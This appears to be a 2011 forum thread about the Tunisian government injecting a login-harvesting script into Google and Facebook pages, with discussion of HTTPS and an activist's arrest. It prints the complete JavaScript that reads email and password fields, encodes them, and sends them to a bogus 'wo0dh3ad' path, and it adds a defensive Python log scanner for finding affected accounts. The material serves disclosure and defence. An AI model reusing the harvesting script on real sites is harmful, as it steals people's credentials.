This is the function used by Tunisian government agencies to harvest logins/passwords:
see also http://www.thetechherald.com/article.php/201101/6651

<script language="javascript">
<!--
// h6h: obfuscates a string by turning each character into two lowercase
// letters, one for the high nibble and one for the low nibble (both offset by 'a').
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
// r5t: random lowercase string of the given length, used as a cache-buster in the query.
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
// hAAAQ3d: reads the e-mail and password fields of the Google login form, encodes them
// and builds the exfiltration URL; the request method is chosen by browser.
function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value;
var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);
var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
// inv0k1 (defined but not called here), inv0k2 and inv0k3: three ways to fire the GET request.
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->
</script>
This is why login forms themselves must be opened over an HTTPS connection. Displaying a login form over HTTP which POSTs to HTTPS is easily MITM'd.

Think of your users. Some of them will be accessing your sites from oppressive regimes. Let them do so safely.

Taking Facebook as an example, considering how global their usage is, and the amount of sensitive data people's accounts contain, it's unforgivable that they don't force HTTPS traffic for everything.
Slim Amamou, who is named in the article as the one who discovered this code, has been arrested. His phone is still updating his Google Latitude position, moving between several government buildings.

http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-blogger-slim-amamou-arrested-today/
"Fortunately, because the fake "wo0dh3ad" page accessed was on their site, Facebook may well have a log of everyone whose account was compromised and can take steps to warn and protect their Tunisian users."

Why would the Tunisian government have allowed ISPs to forward these requests? Facebook probably knows nothing about this.
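The comment above points at the one defensive upside of the script: every credential it stole left a request for the bogus "wo0dh3ad" path in the victim site's access logs, and the `u=` parameter is only nibble-encoded, not encrypted. The following is an added example (not code from the thread or from any site mentioned in it) showing how a site operator could scan such logs to find which accounts to notify. It assumes common-log-format lines; the sample lines are constructed here, and the encoding is reversed from the posted `h6h` function. Passwords are left undecoded on purpose, since only the account list is needed to force resets.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in common log format (not real data).
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jan/2011:10:12:01 +0100] "GET /wo0dh3ad?q=kqzvb&u=gbgmgjgdgf&p=hagbhdhdhhgphcge HTTP/1.1" 404 0
203.0.113.11 - - [07/Jan/2011:10:12:05 +0100] "GET /search?q=weather HTTP/1.1" 200 512
203.0.113.12 - - [07/Jan/2011:10:13:44 +0100] "GET /wo0dh3ad?q=aaaaa&u=gcgpgc HTTP/1.1" 404 0
"""

# Client IP, timestamp and request target are all we need from each line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+"')

# Exfiltration path taken from the posted script.
EXFIL_PATH = "/wo0dh3ad"


def decode_h6h(encoded: str) -> str:
    """Reverse the script's h6h() encoding.

    h6h emits two lowercase letters per character: the high nibble plus 97 ('a'),
    then the low nibble plus 97, so every byte becomes a pair of letters 'a'..'p'.
    Anything outside that alphabet is not h6h output and is rejected.
    """
    if len(encoded) % 2 != 0:
        raise ValueError("h6h output always has even length")
    out = []
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        h, l = ord(hi) - 97, ord(lo) - 97
        if not (0 <= h <= 15 and 0 <= l <= 15):
            raise ValueError(f"invalid h6h pair {hi!r}{lo!r}")
        out.append(chr((h << 4) | l))
    return "".join(out)


def extract_compromised_users(log_text: str):
    """Return (client_ip, timestamp, username) for every request to the exfil path.

    Only the 'u' parameter is decoded; the 'p' parameter is ignored so that
    plaintext passwords never end up in the incident report.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        parts = urlsplit(target)
        if parts.path != EXFIL_PATH:
            continue
        params = parse_qs(parts.query)
        if "u" not in params:
            continue
        try:
            user = decode_h6h(params["u"][0])
        except ValueError:
            user = "<undecodable>"
        hits.append((ip, ts, user))
    return hits


if __name__ == "__main__":
    for ip, ts, user in extract_compromised_users(SAMPLE_LOG):
        print(f"{ts}  {ip}  {user}")
```

Run against a real log, the output is the list of accounts (and source addresses) to force a password reset on; the 404 status on the sample lines is exactly what such requests would produce, since the path never existed on the site, which also makes them easy to alert on.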
Proves again, there is really no excuse not to use HTTPS for everything.

Encryption/certificate validation make it much harder to pull off a MITM attack like this, especially by companies and small repressive governments.